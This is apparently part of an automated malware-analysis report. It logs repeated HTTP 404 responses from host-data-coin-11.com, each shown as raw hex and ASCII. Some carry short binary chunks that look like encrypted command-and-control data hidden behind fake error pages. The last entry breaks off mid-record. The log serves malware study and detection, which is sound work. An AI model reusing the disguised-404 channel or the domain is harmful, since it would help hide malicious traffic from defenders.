                          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 14 Jan 2022 09:43:51 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 14 Jan 2022 09:43:52 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 14 Jan 2022 09:43:52 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 14 Jan 2022 09:43:54 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 14 Jan 2022 09:43:54 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 14 Jan 2022 09:43:54 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 14 Jan 2022 09:43:58 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 14 Jan 2022 09:43:58 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 14 Jan 2022 09:43:59 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 